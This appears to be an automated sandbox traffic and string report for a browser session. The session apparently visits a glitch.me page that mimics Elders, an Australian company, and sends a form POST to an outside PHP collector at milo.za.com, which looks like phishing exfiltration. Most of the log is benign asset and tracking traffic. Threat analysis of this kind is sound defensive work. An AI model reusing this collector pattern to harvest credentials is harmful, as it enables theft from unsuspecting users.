Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/branch-services/corporate-office-icon.png HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true; _clsk=nd89pf%7C1730793805857%7C1%7C1%7Cw.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CMCSYNCSOP%7C411-20040%7CvVersion%7C5.5.0
Source: global trafficHTTP traffic detected: GET /content/dam/eld/images/community---events/events/lock_trial_site_set_up_shot.jpg HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true; _clsk=nd89pf%7C1730793805857%7C1%7C1%7Cw.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CMCSYNCSOP%7C411-20040%7CvVersion%7C5.5.0
Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: chromecache_169.2.drString found in binary or memory: <a data-cmp-clickable href="http://www.linkedin.com/company/elderslimited/" target="_blank" class="column-light" rel="noopener"> equals www.linkedin.com (Linkedin)
Source: chromecache_169.2.drString found in binary or memory: <a data-cmp-clickable href="https://www.facebook.com/EldersRuralServices" target="_blank" class="column-light" rel="noopener"> equals www.facebook.com (Facebook)
Source: chromecache_169.2.drString found in binary or memory: <a data-cmp-clickable href="https://www.youtube.com/user/EldersLimited" target="_blank" class="column-light" rel="noopener"> equals www.youtube.com (Youtube)
Source: chromecache_169.2.drString found in binary or memory: <noscript><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=1013340413305983&ev=PageView&noscript=1"/></noscript> equals www.facebook.com (Facebook)
Source: chromecache_189.2.drString found in binary or memory: _satellite.__registerScript('https://assets.adobedtm.com/728d44811931/14db0b582053/cbed442a9121/RCbad2c954d87f48819c96e16d0db6567c-source.min.js', "<script>\nconsole.log('Global | Ad Pixel Started');\n</script>\n\n<!-- Meta Pixel Code -->\n<script>\n!function(f,b,e,v,n,t,s)\n{if(f.fbq)return;n=f.fbq=function(){n.callMethod?\nn.callMethod.apply(n,arguments):n.queue.push(arguments)};\nif(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';\nn.queue=[];t=b.createElement(e);t.async=!0;\nt.src=v;s=b.getElementsByTagName(e)[0];\ns.parentNode.insertBefore(t,s)}(window, document,'script',\n'https://connect.facebook.net/en_US/fbevents.js');\nfbq('init', '842278510644971');\nfbq('track', 'PageView');\n</script>\n<noscript><img height=\"1\" width=\"1\" style=\"display:none\"\nsrc=https://www.facebook.com/tr?id=842278510644971&ev=PageView&noscript=1\n/></noscript>\n<!-- End Meta Pixel Code -->\n\n<!-- Meta Pixel Code -->\n<script>\n!function(f,b,e,v,n,t,s)\n{if(f.fbq)return;n=f.fbq=function(){n.callMethod?\nn.callMethod.apply(n,arguments):n.queue.push(arguments)};\nif(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';\nn.queue=[];t=b.createElement(e);t.async=!0;\nt.src=v;s=b.getElementsByTagName(e)[0];\ns.parentNode.insertBefore(t,s)}(window, document,'script',\n'https://connect.facebook.net/en_US/fbevents.js');\nfbq('init', '253007270729203');\nfbq('track', 'PageView');\n</script>\n<noscript><img height=\"1\" width=\"1\" style=\"display:none\"\nsrc=https://www.facebook.com/tr?id=253007270729203&ev=PageView&noscript=1\n/></noscript>\n<!-- End Meta Pixel Code -->\n\n\n<script>\nconsole.log('Global | Ad Pixel Ended');\n</script>\n"); equals www.facebook.com (Facebook)
Source: chromecache_114.2.dr, chromecache_220.2.drString found in binary or memory: return b}lD.F="internal.enableAutoEventOnTimer";var Yb=ka(["data-gtm-yt-inspected-"]),nD=["www.youtube.com","www.youtube-nocookie.com"],oD,pD=!1; equals www.youtube.com (Youtube)
Source: chromecache_226.2.drString found in binary or memory: return function(a,b,c,d){var e={exports:{}};e.exports;(function(){"use strict";var b=f.getFbeventsModules("signalsFBEventsGetTier"),c=d();function d(){try{if(a.trustedTypes&&a.trustedTypes.createPolicy){var b=a.trustedTypes;return b.createPolicy("facebook.com/signals/iwl",{createScriptURL:function(a){var b=new URL(a);b=b.hostname.endsWith(".facebook.com")&&b.pathname=="/signals/iwl.js";if(!b)throw new Error("Disallowed script URL");return a}})}}catch(a){}return null}e.exports=function(a,d){d=b(d);d=d==null?"www.facebook.com":"www."+d+".facebook.com";d="https://"+d+"/signals/iwl.js?pixel_id="+a;if(c!=null)return c.createScriptURL(d);else return d}})();return e.exports}(a,b,c,d)}); equals www.facebook.com (Facebook)
Source: chromecache_226.2.drString found in binary or memory: return function(f,b,c,d){var e={exports:{}};e.exports;(function(){"use strict";var a=/^https:\/\/www\.([A-Za-z0-9\.]+)\.facebook\.com\/tr\/?$/,b=["https://www.facebook.com/tr","https://www.facebook.com/tr/"];e.exports=function(c){if(b.indexOf(c)!==-1)return null;var d=a.exec(c);if(d==null)throw new Error("Malformed tier: "+c);return d[1]}})();return e.exports}(a,b,c,d)}); equals www.facebook.com (Facebook)
Source: chromecache_226.2.drString found in binary or memory: return function(f,g,h,i){var j={exports:{}};j.exports;(function(){"use strict";var a={ENDPOINT:"https://www.facebook.com/tr/",INSTAGRAM_TRIGGER_ATTRIBUTION:"https://www.instagram.com/tr/",AEM_ENDPOINT:"https://www.facebook.com/.well-known/aggregated-event-measurement/",GPS_ENDPOINT:"https://www.facebook.com/privacy_sandbox/pixel/register/trigger/",TOPICS_API_ENDPOINT:"https://www.facebook.com/privacy_sandbox/topics/registration/"};j.exports=a})();return j.exports}(a,b,c,d)}); equals www.facebook.com (Facebook)
Source: global trafficDNS traffic detected: DNS query: astonishing-maize-sunstone.glitch.me
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: kit.fontawesome.com
Source: global trafficDNS traffic detected: DNS query: ka-f.fontawesome.com
Source: global trafficDNS traffic detected: DNS query: upload.wikimedia.org
Source: global trafficDNS traffic detected: DNS query: logo.clearbit.com
Source: global trafficDNS traffic detected: DNS query: milo.za.com
Source: global trafficDNS traffic detected: DNS query: elders.com.au
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: unpkg.com
Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global trafficDNS traffic detected: DNS query: assets.adobedtm.com
Source: global trafficDNS traffic detected: DNS query: connect.facebook.net
Source: global trafficDNS traffic detected: DNS query: www.clarity.ms
Source: global trafficDNS traffic detected: DNS query: dpm.demdex.net
Source: global trafficDNS traffic detected: DNS query: cdn.mouseflow.com
Source: global trafficDNS traffic detected: DNS query: w.clarity.ms
Source: global trafficDNS traffic detected: DNS query: eldersrural.demdex.net
Source: global trafficDNS traffic detected: DNS query: cm.everesttech.net
Source: global trafficDNS traffic detected: DNS query: www.facebook.com
Source: global trafficDNS traffic detected: DNS query: eldersrural.sc.omtrdc.net
Source: global trafficDNS traffic detected: DNS query: yourir.info
Source: global trafficDNS traffic detected: DNS query: apimprd.ext.elders.com.au
Source: unknownHTTP traffic detected: POST //pood/phpp4all.php HTTP/1.1Host: milo.za.comConnection: keep-aliveContent-Length: 260sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvnAzAzUyr0vF72WMAccept: */*Origin: https://astonishing-maize-sunstone.glitch.meSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://astonishing-maize-sunstone.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: chromecache_184.2.drString found in binary or memory: http://fontawesome.io
Source: chromecache_184.2.drString found in binary or memory: http://fontawesome.io/license
Source: chromecache_125.2.dr, chromecache_200.2.drString found in binary or memory: http://github.com/kenwheeler/slick
Source: chromecache_125.2.dr, chromecache_200.2.drString found in binary or memory: http://github.com/kenwheeler/slick/issues
Source: chromecache_222.2.dr, chromecache_116.2.drString found in binary or memory: http://jquery.com/
Source: chromecache_222.2.dr, chromecache_116.2.drString found in binary or memory: http://jquery.org/license
Source: chromecache_125.2.dr, chromecache_200.2.drString found in binary or memory: http://kenwheeler.github.io
Source: chromecache_125.2.dr, chromecache_200.2.drString found in binary or memory: http://kenwheeler.github.io/slick
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: http://modernizr.com/docs/#prefixed)
Source: chromecache_210.2.dr, chromecache_165.2.drString found in binary or memory: http://ns.attribution.com/ads/1.0/
Source: chromecache_222.2.dr, chromecache_116.2.drString found in binary or memory: http://sizzlejs.com/
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: http://www.andismith.com/blog/2012/02/modernizr-prefixed/)
Source: chromecache_125.2.dr, chromecache_200.2.dr, chromecache_115.2.dr, chromecache_152.2.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: chromecache_125.2.dr, chromecache_200.2.drString found in binary or memory: http://www.apache.org/licenses/LICENSE2.0
Source: chromecache_169.2.drString found in binary or memory: http://www.linkedin.com/company/elderslimited/
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: http://www.quirksmode.org/js/events_properties.html
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: http://www.whatwg.org/specs/web-apps/current-work/multipage/the-input-element.html#input-type-attr-s
Source: chromecache_169.2.drString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js
Source: chromecache_189.2.drString found in binary or memory: https://assets.adobedtm.com/728d44811931/14db0b582053/cbed442a9121/RCbad2c954d87f48819c96e16d0db6567
Source: chromecache_214.2.dr, chromecache_118.2.drString found in binary or memory: https://assets.adobedtm.com/728d44811931/14db0b582053/launch-f5e74cc94fc9.js
Source: chromecache_169.2.drString found in binary or memory: https://assets.adobedtm.com/728d44811931/14db0b582053/launch-f5e74cc94fc9.min.js
Source: chromecache_150.2.dr, chromecache_187.2.drString found in binary or memory: https://assets.adobedtm.com/extensions/EP8757b503532a44a68eee17773f6f10a0/AppMeasurement.js
Source: chromecache_232.2.dr, chromecache_230.2.drString found in binary or memory: https://assets.adobedtm.com/extensions/EP8757b503532a44a68eee17773f6f10a0/AppMeasurement_Module_Acti
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=608416
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=8538
Source: chromecache_125.2.dr, chromecache_200.2.drString found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=210934
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1276240
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=208427
Source: chromecache_114.2.dr, chromecache_220.2.drString found in binary or memory: https://cct.google/taggy/agent.js
Source: chromecache_169.2.drString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
Source: chromecache_114.2.dr, chromecache_220.2.drString found in binary or memory: https://cdn.mouseflow.com/projects/
Source: chromecache_169.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css
Source: chromecache_199.2.dr, chromecache_173.2.drString found in binary or memory: https://cloud.google.com/contact
Source: chromecache_199.2.dr, chromecache_173.2.drString found in binary or memory: https://cloud.google.com/recaptcha-enterprise/billing-information
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=355103
Source: chromecache_166.2.dr, chromecache_226.2.drString found in binary or memory: https://connect.facebook.net/
Source: chromecache_175.2.dr, chromecache_189.2.dr, chromecache_169.2.drString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
Source: chromecache_166.2.dr, chromecache_226.2.drString found in binary or memory: https://connect.facebook.net/log/fbevents_telemetry/
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/AnimationEvent
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/EventTarget/addEventListener#Safely_detecting_optio
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/KeyboardEvent#Key_names
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/TransitionEvent
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Math/clz32
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/is
Source: chromecache_125.2.dr, chromecache_200.2.drString found in binary or memory: https://developer.mozilla.org/enUS/docs/Web/API/Element/closest#Polyfill
Source: chromecache_125.2.dr, chromecache_200.2.drString found in binary or memory: https://developer.mozilla.org/enUS/docs/Web/API/Element/matches#Polyfill
Source: chromecache_199.2.dr, chromecache_173.2.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-reca
Source: chromecache_199.2.dr, chromecache_173.2.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#localhost_support
Source: chromecache_199.2.dr, chromecache_173.2.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que
Source: chromecache_169.2.drString found in binary or memory: https://elders.com.au/
Source: chromecache_169.2.drString found in binary or memory: https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site/resources/images/png/logo-elders.p
Source: chromecache_169.2.drString found in binary or memory: https://eldersonline.elders.com.au/dcxpgmlib/sa1/ecpwp0001.html?PANEL=HOME
Source: chromecache_169.2.drString found in binary or memory: https://eldersonline.elders.com.au/dcxpgmlib/sa1/ecpwp0001.html?PANEL=HOME&#34;
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://electronjs.org/docs/api/webview-tag
Source: chromecache_178.2.drString found in binary or memory: https://fb.me/react-polyfills
Source: chromecache_179.2.dr, chromecache_223.2.dr, chromecache_177.2.dr, chromecache_134.2.dr, chromecache_148.2.dr, chromecache_153.2.dr, chromecache_240.2.dr, chromecache_129.2.drString found in binary or memory: https://fontawesome.com
Source: chromecache_179.2.dr, chromecache_223.2.dr, chromecache_177.2.dr, chromecache_134.2.dr, chromecache_148.2.dr, chromecache_153.2.dr, chromecache_240.2.dr, chromecache_129.2.drString found in binary or memory: https://fontawesome.com/license/free
Source: chromecache_182.2.dr, chromecache_154.2.dr, chromecache_124.2.dr, chromecache_178.2.drString found in binary or memory: https://getbootstrap.com/)
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://github.com/facebook/create-react-app/issues/3482
Source: chromecache_137.2.dr, chromecache_195.2.drString found in binary or memory: https://github.com/facebook/react/issues
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://github.com/facebook/react/issues/11347
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://github.com/facebook/react/issues/11768
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://github.com/facebook/react/issues/11807
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://github.com/facebook/react/issues/11918
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://github.com/facebook/react/issues/12502
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://github.com/facebook/react/issues/12506
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://github.com/facebook/react/issues/12995
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://github.com/facebook/react/issues/13188
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://github.com/facebook/react/issues/13222
Source: chromecache_138.2.dr, chromecache_137.2.dr, chromecache_155.2.dr, chromecache_195.2.drString found in binary or memory: https://github.com/facebook/react/issues/13610
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://github.com/facebook/react/issues/13688
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://github.com/facebook/react/issues/14239
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://github.com/facebook/react/issues/14365
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://github.com/facebook/react/issues/16585
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://github.com/facebook/react/issues/16734
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://github.com/facebook/react/issues/1698
Source: chromecache_138.2.dr, chromecache_137.2.dr, chromecache_155.2.dr, chromecache_195.2.drString found in binary or memory: https://github.com/facebook/react/issues/19099
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://github.com/facebook/react/issues/19651
Source: chromecache_137.2.dr, chromecache_195.2.drString found in binary or memory: https://github.com/facebook/react/issues/20756
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://github.com/facebook/react/issues/21712).
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://github.com/facebook/react/issues/22459
Source: chromecache_137.2.dr, chromecache_195.2.drString found in binary or memory: https://github.com/facebook/react/issues/3236).
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://github.com/facebook/react/issues/3877
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://github.com/facebook/react/issues/6731#issuecomment-254874553
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://github.com/facebook/react/issues/708.
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://github.com/facebook/react/issues/7253
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://github.com/facebook/react/pull/10676.
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://github.com/facebook/react/pull/11157.
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://github.com/facebook/react/pull/13384
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://github.com/facebook/react/pull/19216.
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://github.com/facebook/react/pull/21666).
Source: chromecache_138.2.dr, chromecache_137.2.dr, chromecache_155.2.dr, chromecache_195.2.drString found in binary or memory: https://github.com/facebook/react/pull/22064.
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://github.com/facebook/react/pull/6896
Source: chromecache_222.2.dr, chromecache_116.2.drString found in binary or memory: https://github.com/gnarf37/jquery-requestAnimationFrame
Source: chromecache_147.2.dr, chromecache_172.2.drString found in binary or memory: https://github.com/microsoft/clarity
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://github.com/mozilla/gecko-dev/blob/4e638efc71/layout/style/test/property_database.js
Source: chromecache_125.2.dr, chromecache_200.2.drString found in binary or memory: https://github.com/select2/select2/blob/master/LICENSE.md
Source: chromecache_182.2.dr, chromecache_154.2.dr, chromecache_124.2.dr, chromecache_178.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/main/LICENSE)
Source: chromecache_182.2.dr, chromecache_154.2.dr, chromecache_124.2.dr, chromecache_178.2.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
Source: chromecache_202.2.drString found in binary or memory: https://goo.gl/maps/bBNFUxbFm24iPiek7
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://html.spec.whatwg.org/#do-not-apply
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#integration-with-idl
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/semantics.html#the-html-element
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#generate-implied-end-tags
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#has-an-element-in-button-scope
Source: chromecache_155.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#has-an-element-in-scope
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#html-integration-point
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#parsing-main-inbody
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#parsing-main-incaption
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#parsing-main-incolgroup
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#parsing-main-inhead
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#parsing-main-inselect
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#parsing-main-intable
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#parsing-main-intbody
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#parsing-main-intd
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#parsing-main-intr
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#special
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://infra.spec.whatwg.org/#ascii-tab-or-newline
Source: chromecache_138.2.dr, chromecache_155.2.drString found in binary or memory: https://infra.spec.whatwg.org/#c0-control-or-space
Source: chromecache_180.2.dr, chromecache_241.2.drString found in binary or memory: https://ka-f.fontawesome.com
Source: chromecache_180.2.dr, chromecache_241.2.drString found in binary or memory: https://kit.fontawesome.com
Source: chromecache_135.2.drString found in binary or memory: https://kit.fontawesome.com/f6136e9b49.js
Source: chromecache_135.2.drString found in binary or memory: https://logo.clearbit.com/$
Source: chromecache_135.2.drString found in binary or memory: https://milo.za.com//pood/phpp4all.php
Source: chromecache_114.2.dr, chromecache_220.2.drString found in binary or memory: https://pagead2.googlesyndication.com
Source: chromecache_114.2.dr, chromecache_220.2.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe
